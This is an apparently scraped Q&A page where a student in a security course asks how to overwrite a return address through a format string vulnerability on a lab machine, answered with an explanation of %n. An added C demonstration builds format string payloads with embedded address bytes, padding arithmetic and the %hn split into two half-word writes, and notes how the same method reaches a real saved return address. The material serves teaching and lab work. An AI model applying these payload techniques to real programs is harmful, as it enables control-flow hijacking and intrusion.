How to write value into an address in format string attack


printf cannot write anywhere without using the %n format specifier. This is the one you're missing. Something like %.987654d%n will write the number 987654 (the number of characters output so far) to an address specified by the second argument, where the first argument is an int. This should be enough to get you started.

Author: Admin

Updated on June 23, 2022
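A worked demonstration of the answer's `%n` idiom and of the question's byte-counting problem, added here as an editor's example; it is not code from the original post or its author. It assumes a little-endian glibc system, uses `snprintf` into a large buffer instead of `printf` so the padding is not dumped to the terminal, and passes the target pointer explicitly instead of relying on a particular stack offset (the embedded `0xaabbccdd` bytes are still counted exactly as a real target would count them). Part 3 goes beyond what the question needs and shows the usual `%hn` split for values too large to pad to.

```c
#undef _FORTIFY_SOURCE  /* fortified glibc aborts on %n in a writable (runtime-built) format, which parts 2 and 3 use */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Stand-ins for the memory the question wants to overwrite (a saved return
   address).  Globals keep the demo deterministic: nothing here depends on
   stack layout or ASLR. */
static int target = 0;                /* a 4-byte slot written through %n          */
static unsigned short slot[2] = {0};  /* the same 4 bytes seen as addr, addr+2 for %hn */

/* Sink large enough that nothing is truncated; snprintf's %n stores the
   number of characters produced so far, exactly as printf's does. */
static char sink[1 << 20];

/* Part 1: the answer's idiom as a literal format.  "%.987654d" prints the
   int argument zero-padded to 987654 digits, so exactly 987654 bytes have
   been produced when %n runs; %n stores that count through the next
   argument, which must be an int *.  Returns what landed in target. */
int write_with_literal_format(void)
{
    target = 0;
    snprintf(sink, sizeof sink, "%.987654d%n", 0, &target);
    return target;
}

/* Part 2: the question's layout.  The attacker owns the whole format, so the
   address goes first as raw bytes (\xdd\xcc\xbb\xaa for 0xaabbccdd on a
   little-endian 32-bit box; a zero byte would end the string).  printf copies
   those bytes to the output like any literal text, so they count toward %n:
   the padding must be value minus the bytes already produced.  argpos is the
   argument slot the address bytes land in, found the way the question did
   (AAAA_%10$x printing 41414141).  Returns the payload length, 0 on error. */
size_t build_payload(char *out, size_t outsz, uint32_t addr, unsigned value,
                     unsigned argpos)
{
    size_t n = sizeof addr;
    if (value < n || outsz < n + 32)
        return 0;
    memcpy(out, &addr, n);                  /* raw little-endian address bytes */
    unsigned pad = value - (unsigned)n;     /* bytes still to produce before %n */
    /* "%1$.<pad>d" emits exactly pad characters for the int 0 (none if pad
       is 0), then "%<argpos>$n" stores the running count. */
    n += (size_t)snprintf(out + n, outsz - n, "%%1$.%ud%%%u$n", pad, argpos);
    return n;
}

/* Runs a payload the way the vulnerable program would: the attacker's string
   is the format.  Argument 1 feeds the padding conversion; argument 2 is what
   %2$n writes through.  In the real attack no pointer is passed and %argpos$n
   reads the embedded address bytes out of the stack slot they landed in;
   supplying &target explicitly lets the arithmetic be checked without that
   layout.  Returns what landed in target. */
int run_payload(const char *payload)
{
    target = 0;
    snprintf(sink, sizeof sink, payload, 0, &target);
    return target;
}

/* Builds and runs the question's payload with the address in slot 2. */
int demo_embedded_address(uint32_t addr, unsigned value)
{
    char payload[64];
    if (build_payload(payload, sizeof payload, addr, value, 2) == 0)
        return -1;
    return run_payload(payload);
}

/* Part 3: the case the question says it can skip.  A real return address is
   far too many bytes to emit, so it is written as two 16-bit halves with %hn,
   one to addr and one to addr+2.  Each half needs the low 16 bits of the
   running count to equal it; writing the smaller half first means the count
   only grows, and the second padding is the difference modulo 65536.
   Returns the 32-bit value assembled from the two slots. */
uint32_t write_halves(uint32_t value)
{
    unsigned lo = value & 0xffff, hi = value >> 16;
    short *p_lo = (short *)&slot[0];              /* addr     */
    short *p_hi = (short *)&slot[1];              /* addr + 2 */
    unsigned first  = lo <= hi ? lo : hi;
    unsigned second = lo <= hi ? hi : lo;
    short *p1 = lo <= hi ? p_lo : p_hi;
    short *p2 = lo <= hi ? p_hi : p_lo;
    char fmt[64];
    snprintf(fmt, sizeof fmt, "%%1$.%ud%%2$hn%%1$.%ud%%3$hn",
             first, (second - first) & 0xffff);
    slot[0] = slot[1] = 0;
    snprintf(sink, sizeof sink, fmt, 0, p1, p2);
    return (uint32_t)slot[0] | ((uint32_t)slot[1] << 16);
}

int main(void)
{
    printf("literal %%.987654d%%n        -> %d\n", write_with_literal_format());
    printf("embedded 0xaabbccdd payload -> %d\n", demo_embedded_address(0xaabbccdd, 987654));
    printf("%%hn halves of 0xaabbccdd    -> 0x%08x\n", (unsigned)write_halves(0xaabbccdd));
    return 0;
}
```

Build with plain `gcc fmtdemo.c -o fmtdemo`. On distributions that enable `_FORTIFY_SOURCE` by default, a format containing `%n` that lives in writable memory makes glibc abort with "%n in writable segment detected", which is why the demo undefines it; the lab target in the question, built with an old gcc, has no such check, and with ASLR and a non-executable stack disabled the same arithmetic applies to the real saved return address.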

Comments

  • Admin
    Admin almost 2 years

    I'm taking a security course which needs us to do a format string attack on a Unix virtual machine. The vulnerability is a format string using a command-line argument.

    My question is how can I write value into an address in format string (like write shell code address into function return address)?

    For example, I try to write value 987654 into the return address location 0xaabbccdd. I tried some strings like "AAAA_%10$x", and this can lead the program to print AAAA_41414141.

    Then I replace the letters with my address and try to overwrite it.

    "\xdd\xcc\xbb\xaa_%10$x_%54321x_%n"
    

    But it does not work. I saw an article saying I should use a smaller number in %54321x since there are some chars I already wrote, but I don't know how many chars I've written before %54321x, either.

    Note: the environment has an old version of gcc, so it's not necessary to worry about the value being too large. Any suggestions? Thanks.

  • Oliver Charlesworth
    Oliver Charlesworth over 13 years
    sprintf writing to a char buffer on the stack could also be used to do malicious damage...
  • R.. GitHub STOP HELPING ICE
    R.. GitHub STOP HELPING ICE over 13 years
    @Oli: yes but that's not a format string attack, which OP's assignment seems to be about...
  • R.. GitHub STOP HELPING ICE
    R.. GitHub STOP HELPING ICE over 13 years
    I hardly call that a format string vuln, merely an ordinary strcpy buffer overflow. The fact that sprintf is being used instead of strcpy is rather incidental.